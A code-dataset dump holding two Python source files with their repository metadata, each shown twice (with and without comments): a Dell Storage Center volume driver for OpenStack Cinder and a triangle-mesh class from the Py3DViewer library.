hexsha stringlengths 40 40 | size int64 4 996k | ext stringclasses 8
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 4 245 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 40 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 245 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 40 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 67k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 245 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 40 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 4 996k | avg_line_length float64 1.33 58.2k | max_line_length int64 2 323k | alphanum_fraction float64 0 0.97 | content_no_comment stringlengths 0 946k | is_comment_constant_removed bool 2
classes | is_sharp_comment_removed bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
f72333a6d2c63ba5422144f77ace3843512c1078 | 14,661 | py | Python | cinder/volume/drivers/dell/dell_storagecenter_common.py | alexpilotti/cinder-ci-fixes | c0ed2ab8cc6b1197e426cd6c58c3b582624d1cfd | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/dell/dell_storagecenter_common.py | alexpilotti/cinder-ci-fixes | c0ed2ab8cc6b1197e426cd6c58c3b582624d1cfd | [
"Apache-2.0"
] | null | null | null | cinder/volume/drivers/dell/dell_storagecenter_common.py | alexpilotti/cinder-ci-fixes | c0ed2ab8cc6b1197e426cd6c58c3b582624d1cfd | [
"Apache-2.0"
] | null | null | null | # Copyright 2015 Dell Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder.volume.drivers.dell import dell_storagecenter_api
from cinder.volume.drivers.san import san
common_opts = [
cfg.IntOpt('dell_sc_ssn',
default=64702,
help='Storage Center System Serial Number'),
cfg.IntOpt('dell_sc_api_port',
default=3033,
help='Dell API port'),
cfg.StrOpt('dell_sc_server_folder',
default='openstack',
help='Name of the server folder to use on the Storage Center'),
cfg.StrOpt('dell_sc_volume_folder',
default='openstack',
help='Name of the volume folder to use on the Storage Center')
]
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(common_opts)
class DellCommonDriver(san.SanDriver):
def __init__(self, *args, **kwargs):
super(DellCommonDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(common_opts)
self.backend_name =\
self.configuration.safe_get('volume_backend_name') or 'Dell'
def _bytes_to_gb(self, spacestring):
'''Space is returned in a string like ...
7.38197504E8 Bytes
Need to split that apart and convert to GB.
returns gbs in int form
'''
try:
n = spacestring.split(' ', 1)
fgbs = float(n[0]) / 1073741824.0
igbs = int(fgbs)
return igbs
except Exception:
# If any of that blew up it isn't in the format we
# thought so eat our error and return None
return None
def do_setup(self, context):
'''One time driver setup.
Called once by the manager after the driver is loaded.
Sets up clients, check licenses, sets up protocol
specific helpers.
'''
self._client = dell_storagecenter_api.StorageCenterApiHelper(
self.configuration)
def check_for_setup_error(self):
'''Validates the configuration information.'''
with self._client.open_connection() as api:
ssn = self.configuration.safe_get('dell_sc_ssn')
api.find_sc(ssn)
def create_volume(self, volume):
'''Create a volume.'''
volume_name = volume.get('id')
volume_size = volume.get('size')
LOG.debug('Creating volume %(name)s of size %(size)s',
{'name': volume_name, 'size': volume_size})
scvolume = None
with self._client.open_connection() as api:
try:
# we use id as our name as it s unique
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
LOG.debug('create_volume: %(name)s on %(ssn)s in %(vf)s',
{'name': volume_name,
'ssn': ssn,
'vf': volume_folder})
if ssn is not None:
scvolume = api.create_volume(volume_name,
volume_size,
ssn,
volume_folder)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume['name'])
if scvolume is None:
raise exception.VolumeBackendAPIException(
_('Unable to create volume'))
def delete_volume(self, volume):
deleted = False
# we use id as our name as it s unique
volume_name = volume.get('id')
LOG.debug('Deleting volume %s', volume_name)
with self._client.open_connection() as api:
try:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
deleted = api.delete_volume(ssn,
volume_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to delete volume %s'),
volume_name)
# if there was an error we will have raised an
# exception. If it failed to delete it is because
# the conditions to delete a volume were not met.
if deleted is False:
raise exception.VolumeIsBusy(volume_name=volume_name)
def create_snapshot(self, snapshot):
'''Create snapshot'''
# our volume name is the volume id
volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
LOG.debug('Creating snapshot %(snap)s on volume %(vol)s',
{'snap': snapshot_id, 'vol': volume_name})
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if scvolume is not None:
if api.create_replay(scvolume,
snapshot_id,
0) is not None:
snapshot['status'] = 'available'
return
else:
LOG.warning(_LW('Unable to locate volume:%s'),
volume_name)
snapshot['status'] = 'error_creating'
raise exception.VolumeBackendAPIException(
_('Failed to create snapshot %s') %
snapshot_id)
def create_volume_from_snapshot(self, volume, snapshot):
'''Create new volume from other volume's snapshot on appliance.'''
scvolume = None
src_volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
volume_name = volume.get('id')
LOG.debug(
'Creating new volume %(vol)s from snapshot %(snap)s '
'from vol %(src)s',
{'vol': volume_name,
'snap': snapshot_id,
'src': src_volume_name})
with self._client.open_connection() as api:
try:
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
srcvol = api.find_volume(ssn,
src_volume_name)
if srcvol is not None:
replay = api.find_replay(srcvol,
snapshot_id)
if replay is not None:
volume_name = volume.get('id')
scvolume = api.create_view_volume(volume_name,
volume_folder,
replay)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume_name)
if scvolume is not None:
LOG.debug('Volume %(n)s created from %(s)s',
{'n': volume_name,
's': snapshot_id})
else:
raise exception.VolumeBackendAPIException(
_('Failed to create volume %s') % volume_name)
def create_cloned_volume(self, volume, src_vref):
'''Creates a clone of the specified volume.'''
scvolume = None
src_volume_name = src_vref.get('id')
volume_name = volume.get('id')
LOG.debug('Creating cloned volume %(clone)s from volume %(vol)s',
{'clone': volume_name,
'vol': src_volume_name})
with self._client.open_connection() as api:
try:
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
srcvol = api.find_volume(ssn,
src_volume_name)
if srcvol is not None:
scvolume = api.create_cloned_volume(volume_name,
volume_folder,
srcvol)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume_name)
if scvolume is not None:
LOG.debug('Volume %(n)s cloned from %(s)s',
{'n': volume_name,
's': src_volume_name})
else:
raise exception.VolumeBackendAPIException(
_('Failed to create volume %s') % volume_name)
def delete_snapshot(self, snapshot):
'''delete_snapshot'''
volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
LOG.debug('Deleting snapshot %(snap)s from volume %(vol)s',
{'snap': snapshot_id,
'vol': volume_name})
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if scvolume is not None:
if api.delete_replay(scvolume,
snapshot_id):
return
# if we are here things went poorly.
snapshot['status'] = 'error_deleting'
raise exception.VolumeBackendAPIException(
_('Failed to delete snapshot %s') % snapshot_id)
def create_export(self, context, volume):
'''Create an export of a volume.
The volume exists on creation and will be visible on
initialize connection. So nothing to do here.
'''
pass
def ensure_export(self, context, volume):
'''Ensure an export of a volume.
Per the eqlx driver we just make sure that the volume actually
exists where we think it does.
'''
scvolume = None
volume_name = volume.get('id')
LOG.debug('Checking existence of volume %s', volume_name)
with self._client.open_connection() as api:
try:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to ensure export of volume %s'),
volume_name)
if scvolume is None:
raise exception.VolumeBackendAPIException(
_('unable to find volume %s') % volume_name)
def remove_export(self, context, volume):
'''Remove an export of a volume.
We do nothing here to match the nothing we do in create export. Again
we do everything in initialize and terminate connection.
'''
pass
def extend_volume(self, volume, new_size):
'''Extend the size of the volume.'''
volume_name = volume.get('id')
LOG.debug('Extending volume %(vol)s to %(size)s',
{'vol': volume_name, 'size': new_size})
if volume is not None:
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if api.expand_volume(scvolume, new_size) is not None:
return
# If we are here nothing good happened.
raise exception.VolumeBackendAPIException(
_('Unable to extend volume %s') % volume_name)
def get_volume_stats(self, refresh=False):
'''Get volume status.
If 'refresh' is True, run update the stats first.
'''
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
'''Retrieve stats info from volume group.'''
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
storageusage = api.get_storage_usage(ssn)
# all of this is basically static for now
data = {}
data['volume_backend_name'] = self.backend_name
data['vendor_name'] = 'Dell'
data['driver_version'] = self.VERSION
data['storage_protocol'] = 'iSCSI'
data['reserved_percentage'] = 0
# in theory if storageusage is None then we should have
# blown up getting it. If not just report inifinite.
if storageusage is not None:
totalcapacity = storageusage.get('availableSpace')
totalcapacitygb = self._bytes_to_gb(totalcapacity)
data['total_capacity_gb'] = totalcapacitygb
freespace = storageusage.get('freeSpace')
freespacegb = self._bytes_to_gb(freespace)
data['free_capacity_gb'] = freespacegb
if data.get('total_capacity_gb') is None:
data['total_capacity_gb'] = 'unavailable'
if data.get('free_capacity_gb') is None:
data['free_capacity_gb'] = 'unavailable'
data['QoS_support'] = False
self._stats = data
LOG.debug('Total cap %(t)s Free cap %(f)s',
{'t': totalcapacitygb,
'f': freespacegb})
| 41.769231 | 78 | 0.544506 |
from oslo_config import cfg
from oslo_log import log as logging
from oslo_utils import excutils
from cinder import exception
from cinder.i18n import _, _LE, _LW
from cinder.volume.drivers.dell import dell_storagecenter_api
from cinder.volume.drivers.san import san
common_opts = [
cfg.IntOpt('dell_sc_ssn',
default=64702,
help='Storage Center System Serial Number'),
cfg.IntOpt('dell_sc_api_port',
default=3033,
help='Dell API port'),
cfg.StrOpt('dell_sc_server_folder',
default='openstack',
help='Name of the server folder to use on the Storage Center'),
cfg.StrOpt('dell_sc_volume_folder',
default='openstack',
help='Name of the volume folder to use on the Storage Center')
]
LOG = logging.getLogger(__name__)
CONF = cfg.CONF
CONF.register_opts(common_opts)
class DellCommonDriver(san.SanDriver):
def __init__(self, *args, **kwargs):
super(DellCommonDriver, self).__init__(*args, **kwargs)
self.configuration.append_config_values(common_opts)
self.backend_name =\
self.configuration.safe_get('volume_backend_name') or 'Dell'
def _bytes_to_gb(self, spacestring):
try:
n = spacestring.split(' ', 1)
fgbs = float(n[0]) / 1073741824.0
igbs = int(fgbs)
return igbs
except Exception:
# thought so eat our error and return None
return None
def do_setup(self, context):
self._client = dell_storagecenter_api.StorageCenterApiHelper(
self.configuration)
def check_for_setup_error(self):
with self._client.open_connection() as api:
ssn = self.configuration.safe_get('dell_sc_ssn')
api.find_sc(ssn)
def create_volume(self, volume):
volume_name = volume.get('id')
volume_size = volume.get('size')
LOG.debug('Creating volume %(name)s of size %(size)s',
{'name': volume_name, 'size': volume_size})
scvolume = None
with self._client.open_connection() as api:
try:
# we use id as our name as it s unique
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
LOG.debug('create_volume: %(name)s on %(ssn)s in %(vf)s',
{'name': volume_name,
'ssn': ssn,
'vf': volume_folder})
if ssn is not None:
scvolume = api.create_volume(volume_name,
volume_size,
ssn,
volume_folder)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume['name'])
if scvolume is None:
raise exception.VolumeBackendAPIException(
_('Unable to create volume'))
def delete_volume(self, volume):
deleted = False
# we use id as our name as it s unique
volume_name = volume.get('id')
LOG.debug('Deleting volume %s', volume_name)
with self._client.open_connection() as api:
try:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
deleted = api.delete_volume(ssn,
volume_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to delete volume %s'),
volume_name)
# if there was an error we will have raised an
# exception. If it failed to delete it is because
# the conditions to delete a volume were not met.
if deleted is False:
raise exception.VolumeIsBusy(volume_name=volume_name)
def create_snapshot(self, snapshot):
# our volume name is the volume id
volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
LOG.debug('Creating snapshot %(snap)s on volume %(vol)s',
{'snap': snapshot_id, 'vol': volume_name})
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if scvolume is not None:
if api.create_replay(scvolume,
snapshot_id,
0) is not None:
snapshot['status'] = 'available'
return
else:
LOG.warning(_LW('Unable to locate volume:%s'),
volume_name)
snapshot['status'] = 'error_creating'
raise exception.VolumeBackendAPIException(
_('Failed to create snapshot %s') %
snapshot_id)
def create_volume_from_snapshot(self, volume, snapshot):
scvolume = None
src_volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
volume_name = volume.get('id')
LOG.debug(
'Creating new volume %(vol)s from snapshot %(snap)s '
'from vol %(src)s',
{'vol': volume_name,
'snap': snapshot_id,
'src': src_volume_name})
with self._client.open_connection() as api:
try:
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
srcvol = api.find_volume(ssn,
src_volume_name)
if srcvol is not None:
replay = api.find_replay(srcvol,
snapshot_id)
if replay is not None:
volume_name = volume.get('id')
scvolume = api.create_view_volume(volume_name,
volume_folder,
replay)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume_name)
if scvolume is not None:
LOG.debug('Volume %(n)s created from %(s)s',
{'n': volume_name,
's': snapshot_id})
else:
raise exception.VolumeBackendAPIException(
_('Failed to create volume %s') % volume_name)
def create_cloned_volume(self, volume, src_vref):
scvolume = None
src_volume_name = src_vref.get('id')
volume_name = volume.get('id')
LOG.debug('Creating cloned volume %(clone)s from volume %(vol)s',
{'clone': volume_name,
'vol': src_volume_name})
with self._client.open_connection() as api:
try:
volume_folder = self.configuration.dell_sc_volume_folder
ssn = api.find_sc(self.configuration.dell_sc_ssn)
srcvol = api.find_volume(ssn,
src_volume_name)
if srcvol is not None:
scvolume = api.create_cloned_volume(volume_name,
volume_folder,
srcvol)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to create volume %s'),
volume_name)
if scvolume is not None:
LOG.debug('Volume %(n)s cloned from %(s)s',
{'n': volume_name,
's': src_volume_name})
else:
raise exception.VolumeBackendAPIException(
_('Failed to create volume %s') % volume_name)
def delete_snapshot(self, snapshot):
volume_name = snapshot.get('volume_id')
snapshot_id = snapshot.get('id')
LOG.debug('Deleting snapshot %(snap)s from volume %(vol)s',
{'snap': snapshot_id,
'vol': volume_name})
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if scvolume is not None:
if api.delete_replay(scvolume,
snapshot_id):
return
# if we are here things went poorly.
snapshot['status'] = 'error_deleting'
raise exception.VolumeBackendAPIException(
_('Failed to delete snapshot %s') % snapshot_id)
def create_export(self, context, volume):
pass
def ensure_export(self, context, volume):
scvolume = None
volume_name = volume.get('id')
LOG.debug('Checking existence of volume %s', volume_name)
with self._client.open_connection() as api:
try:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
except Exception:
with excutils.save_and_reraise_exception():
LOG.error(_LE('Failed to ensure export of volume %s'),
volume_name)
if scvolume is None:
raise exception.VolumeBackendAPIException(
_('unable to find volume %s') % volume_name)
def remove_export(self, context, volume):
pass
def extend_volume(self, volume, new_size):
volume_name = volume.get('id')
LOG.debug('Extending volume %(vol)s to %(size)s',
{'vol': volume_name, 'size': new_size})
if volume is not None:
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
if ssn is not None:
scvolume = api.find_volume(ssn,
volume_name)
if api.expand_volume(scvolume, new_size) is not None:
return
# If we are here nothing good happened.
raise exception.VolumeBackendAPIException(
_('Unable to extend volume %s') % volume_name)
def get_volume_stats(self, refresh=False):
if refresh:
self._update_volume_stats()
return self._stats
def _update_volume_stats(self):
with self._client.open_connection() as api:
ssn = api.find_sc(self.configuration.dell_sc_ssn)
storageusage = api.get_storage_usage(ssn)
# all of this is basically static for now
data = {}
data['volume_backend_name'] = self.backend_name
data['vendor_name'] = 'Dell'
data['driver_version'] = self.VERSION
data['storage_protocol'] = 'iSCSI'
data['reserved_percentage'] = 0
# in theory if storageusage is None then we should have
# blown up getting it. If not just report inifinite.
if storageusage is not None:
totalcapacity = storageusage.get('availableSpace')
totalcapacitygb = self._bytes_to_gb(totalcapacity)
data['total_capacity_gb'] = totalcapacitygb
freespace = storageusage.get('freeSpace')
freespacegb = self._bytes_to_gb(freespace)
data['free_capacity_gb'] = freespacegb
if data.get('total_capacity_gb') is None:
data['total_capacity_gb'] = 'unavailable'
if data.get('free_capacity_gb') is None:
data['free_capacity_gb'] = 'unavailable'
data['QoS_support'] = False
self._stats = data
LOG.debug('Total cap %(t)s Free cap %(f)s',
{'t': totalcapacitygb,
'f': freespacegb})
| true | true |
f72333deff8a4bcf9a7c6709c2fa3551310f9ff5 | 12,891 | py | Python | Py3DViewer/structures/Trimesh.py | hovey/py3DViewer | 7ae1697aa4860430d0d94b854f8b1f2a4b2d895f | [
"MIT"
] | null | null | null | Py3DViewer/structures/Trimesh.py | hovey/py3DViewer | 7ae1697aa4860430d0d94b854f8b1f2a4b2d895f | [
"MIT"
] | null | null | null | Py3DViewer/structures/Trimesh.py | hovey/py3DViewer | 7ae1697aa4860430d0d94b854f8b1f2a4b2d895f | [
"MIT"
] | null | null | null | from .Abstractmesh import AbstractMesh
import numpy as np
from ..utils import IO, ObservableArray, deprecated, utilities
from ..utils.load_operations import get_connectivity_info_surface as get_connectivity_info
from ..utils.load_operations import compute_vertex_normals, compute_face_normals
from ..utils.load_operations import _compute_three_vertex_normals as compute_three_normals
from ..utils.metrics import triangle_aspect_ratio, triangle_area
class Trimesh(AbstractMesh):
"""
This class represents a mesh composed of triangles. It is possible to load the mesh from a file or
from raw geometry and topology data.
Parameters:
filename (string): The name of the file to load
vertices (Array (Nx3) type=float): The list of vertices of the mesh
polys (Array (Nx3) type=int): The list of polygons of the mesh
labels (Array (Nx1) type=int): The list of labels of the mesh (Optional)
"""
def __init__(self, filename=None, vertices=None, polys=None, labels=None, texture=None, mtl=None, smoothness=False):
super(Trimesh, self).__init__()
self.vtx_normals = None # npArray (Nx3)
self.poly_normals = None # npArray (Nx3)
self.texture = texture
self.material = {}
self.groups = {}
self.smoothness = smoothness
self.__map_poly_indices = []
if mtl is not None:
self.__load_from_file(mtl)
if filename is not None:
self.__load_from_file(filename)
self._AbstractMesh__filename = filename.split('/')[-1]
elif vertices is not None and polys is not None:
vertices = np.array(vertices)
polys = np.array(polys)
self.vertices = ObservableArray(vertices.shape)
self.vertices[:] = vertices
self.vertices.attach(self)
self._AbstractMesh__polys = ObservableArray(polys.shape, dtype=np.int64)
self._AbstractMesh__polys[:] = polys
self._AbstractMesh__polys.attach(self)
self.__load_operations()
if labels is not None:
labels = np.array(labels)
assert(labels.shape[0] == polys.shape[0])
self.labels = ObservableArray(labels.shape, dtype=np.int)
self.labels[:] = labels
self.labels.attach(self)
else:
self.labels = ObservableArray(polys.shape[0], dtype=np.int)
self.labels[:] = np.zeros(self.labels.shape, dtype=np.int)
self.labels.attach(self)
self._AbstractMesh__poly_size = 3
self._AbstractMesh__finished_loading = True
# ==================== METHODS ==================== #
def __load_operations(self):
self._dont_update = True
self._AbstractMesh__boundary_needs_update = True
self._AbstractMesh__simplex_centroids = None
self._AbstractMesh__edges, \
self._AbstractMesh__adj_vtx2vtx, \
self._AbstractMesh__adj_vtx2edge, \
self._AbstractMesh__adj_vtx2poly, \
self._AbstractMesh__adj_edge2vtx, \
self._AbstractMesh__adj_edge2edge, \
self._AbstractMesh__adj_edge2poly, \
self._AbstractMesh__adj_poly2vtx, \
self._AbstractMesh__adj_poly2edge, \
self._AbstractMesh__adj_poly2poly = get_connectivity_info(self.num_vertices, self.polys)
self._AbstractMesh__update_bounding_box()
self.reset_clipping()
self.poly_normals = compute_face_normals(self.vertices, self.polys)
self.vtx_normals = compute_vertex_normals(self.poly_normals, self.adj_vtx2poly._NList__list)
self.__compute_metrics()
self._AbstractMesh__simplex_centroids = None
self._dont_update = False
self.update()
def __load_from_file(self, filename):
ext = filename.split('.')[-1]
if ext == 'obj':
self.vertices, self._AbstractMesh__polys, self.poly_normals, self.uvcoords, self.coor, self.groups = IO.read_obj(filename)
# self.vertices, self.faces, self.face_normals = IO.read_obj(filename)
self.vertices.attach(self)
self._AbstractMesh__polys.attach(self)
self.poly_normals.attach(self)
self.uvcoords.attach(self)
self.coor.attach(self)
elif ext == 'mtl':
self.material = IO.read_mtl(filename)
return
elif ext == 'off':
self.vertices, self._AbstractMesh__polys = IO.read_off(filename)
self.vertices.attach(self)
self._AbstractMesh__polys.attach(self)
elif ext == 'mesh':
self.vertices, self._AbstractMesh__polys, labels = IO.read_mesh(filename)
self.vertices.attach(self)
self._AbstractMesh__polys.attach(self)
else:
raise Exception("Only .obj, .off and .mesh files are supported")
self.labels = ObservableArray(self.num_polys, dtype=np.int)
self.labels[:] = np.zeros(self.labels.shape, dtype=np.int) if ext != 'mesh' else labels
self.labels.attach(self)
self.__load_operations()
return self
def save_file(self, filename):
"""
Save the current mesh in a file. Currently it supports the .obj extension.
Parameters:
filename (string): The name of the file
"""
ext = filename.split('.')[-1]
if ext == 'obj':
IO.save_obj(self, filename)
elif ext == 'off':
IO.save_off(self, filename)
elif ext == 'mesh':
IO.save_mesh(self, filename)
else:
raise Exception("Only .obj, .off and .mesh files are supported")
def __compute_metrics(self):
self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)
self.simplex_metrics['aspect_ratio'] = triangle_aspect_ratio(self.vertices, self.polys)
def update_metrics(self):
self.__compute_metrics()
@property
def _map_poly_indices(self):
return self.__map_poly_indices
def boundary(self):
"""
Compute the boundary of the current mesh. It only returns the faces that are inside the clipping
"""
if (self._AbstractMesh__boundary_needs_update):
clipping_range = super(Trimesh, self).boundary()
self._AbstractMesh__visible_polys = clipping_range
self._AbstractMesh__boundary_cached = clipping_range
self._AbstractMesh__boundary_needs_update = False
self.__map_poly_indices = []
counter = 0
for c in clipping_range:
if c:
self.__map_poly_indices.append(counter)
else:
counter = counter + 1
return self.polys[self._AbstractMesh__boundary_cached], self._AbstractMesh__boundary_cached
def as_edges_flat(self):
# Faces inside the bounding box
boundaries = self.boundary()[0]
# Insert into a vertical array all the correspondences between all the vertices collapsed in one dimension
edges = np.c_[boundaries[:, :2], boundaries[:, 1:], boundaries[:, 2], boundaries[:, 0]].flatten()
# edges_flat = self.vertices[edges].tolist()
return edges
def _as_threejs_triangle_soup(self):
tris = self.vertices[self.boundary()[0].flatten()]
return tris.astype(np.float32), compute_three_normals(tris).astype(np.float32)
def as_triangles(self):
return self.boundary()[0].flatten().astype("uint32")
def _as_threejs_colors(self, colors=None):
if colors is not None:
return np.repeat(colors, 3, axis=0)
return np.repeat(self.boundary()[1], 3)
@property
def num_triangles(self):
return self.num_polys
def vertex_remove(self, vtx_id):
"""
Remove a vertex from the current mesh. It affects the mesh geometry.
Parameters:
vtx_id (int): The index of the vertex to remove
"""
self.vertices_remove([vtx_id])
def vertices_remove(self, vtx_ids):
"""
Remove a list of vertices from the current mesh. It affects the mesh geometry.
Parameters:
vtx_ids (Array (Nx1 / 1xN) type=int): List of vertices to remove. Each vertex is in the form [int]
"""
self._dont_update = True
vtx_ids = np.array(vtx_ids)
for v_id in vtx_ids:
self.vertices = np.delete(self.vertices, v_id, 0)
condition = ((self._AbstractMesh__polys[:, 0] != v_id) &
(self._AbstractMesh__polys[:, 1] != v_id) &
(self._AbstractMesh__polys[:, 2] != v_id))
if self.labels is not None:
self.labels = self.labels[condition]
self._AbstractMesh__polys = self._AbstractMesh__polys[condition]
self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 0] > v_id)] -= np.array([1, 0, 0])
self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 1] > v_id)] -= np.array([0, 1, 0])
self._AbstractMesh__polys[(self._AbstractMesh__polys[:, 2] > v_id)] -= np.array([0, 0, 1])
vtx_ids[vtx_ids > v_id] -= 1
self.__load_operations()
def poly_add(self, new_poly):
"""
Add a new face to the current mesh. It affects the mesh topology.
Parameters:
new_poly (Array (Nx1) type=int): Poly to add in the form [int, ..., int]
"""
self.polys_add(new_poly)
def polys_add(self, new_polys):
"""
Add a list of new faces to the current mesh. It affects the mesh topology.
Parameters:
new_polys (Array (NxM) type=int): List of faces to add. Each face is in the form [int, ..., int]
"""
AbstractMesh.polys_add(self, new_polys)
self.__load_operations()
def poly_remove(self, poly_id):
"""
Remove a poly from the current mesh. It affects the mesh topology.
Parameters:
poly_id (int): The index of the face to remove
"""
self.polys_remove([poly_id])
def polys_remove(self, poly_ids):
"""
Remove a list of polys from the current mesh. It affects the mesh topology.
Parameters:
poly_ids (Array (Nx1 / 1xN) type=int): List of polys to remove. Each face is in the form [int]
"""
AbstractMesh.polys_remove(self, poly_ids)
self.__load_operations()
def tessellate(self):
return self.polys
@property
def edge_is_manifold(self):
val = self.edge_valence
return np.logical_and(val > 0, val < 3)
@property
def poly_is_on_boundary(self):
return np.logical_not(np.all(self.adj_poly2poly != -1, axis = 1))
@property
def edge_is_on_boundary(self):
boundary_edges = self.adj_poly2edge[self.poly_is_on_boundary].reshape(-1)
boundary_edges = [e for e in boundary_edges if len(self.adj_edge2poly[e]) == 1]
bool_vec = np.zeros((self.num_edges), dtype=np.bool)
bool_vec[boundary_edges] = True
return bool_vec
@property
def vert_is_on_boundary(self):
boundary_verts = self.edges[self.edge_is_on_boundary].reshape(-1)
bool_vec = np.zeros((self.num_vertices), dtype=np.bool)
bool_vec[boundary_verts] = True
return bool_vec
@property
def area(self):
return np.sum(self.simplex_metrics['area'][1])
def normalize_area(self):
scale_factor = 1.0/np.sqrt(self.area)
self.transform_scale([scale_factor, scale_factor, scale_factor])
self.simplex_metrics['area'] = triangle_area(self.vertices, self.polys)
def sharp_creases(self, threshold=1.0472):
e2p = self.adj_edge2poly.array
indices = np.logical_not(np.all(e2p != -1, axis=1))
angles = utilities.angle_between_vectors(self.poly_normals[e2p[:,0]], self.poly_normals[e2p[:,1]], True)[0]
result = angles > threshold
result[indices] = True
return result
def fix_poly_order():
normals = self.poly_normals
center = self.mesh_centroid
a = (normals-center)
norm = np.linalg.norm(a, axis=1)
norm.shape = (-1,1)
a /= norm
condition = np.einsum("ij,ij->i", a, normals) > 0
self.polys[condition] = np.flip(mesh.polys[condition], axis=1)
self.__load_operations()
#deprecated
@property
@deprecated("Use the method adj_poly2poly instead")
def face2face(self):
return self._AbstractMesh__adj_poly2poly
| 33.483117 | 134 | 0.616321 | from .Abstractmesh import AbstractMesh
import numpy as np
from ..utils import IO, ObservableArray, deprecated, utilities
from ..utils.load_operations import get_connectivity_info_surface as get_connectivity_info
from ..utils.load_operations import compute_vertex_normals, compute_face_normals
from ..utils.load_operations import _compute_three_vertex_normals as compute_three_normals
from ..utils.metrics import triangle_aspect_ratio, triangle_area
class Trimesh(AbstractMesh):
def __init__(self, filename=None, vertices=None, polys=None, labels=None, texture=None, mtl=None, smoothness=False):
super(Trimesh, self).__init__()
self.vtx_normals = None
self.poly_normals = None
self.texture = texture
self.material = {}
self.groups = {}
self.smoothness = smoothness
self.__map_poly_indices = []
if mtl is not None:
self.__load_from_file(mtl)
if filename is not None:
self.__load_from_file(filename)
self._AbstractMesh__filename = filename.split('/')[-1]
elif vertices is not None and polys is not None:
vertices = np.array(vertices)
polys = np.array(polys)
self.vertices = ObservableArray(vertices.shape)
self.vertices[:] = vertices
self.vertices.attach(self)
self._AbstractMesh__polys = ObservableArray(polys.shape, dtype=np.int64)
self._AbstractMesh__polys[:] = polys
self._AbstractMesh__polys.attach(self)
self.__load_operations()
if labels is not None:
labels = np.array(labels)
assert(labels.shape[0] == polys.shape[0])
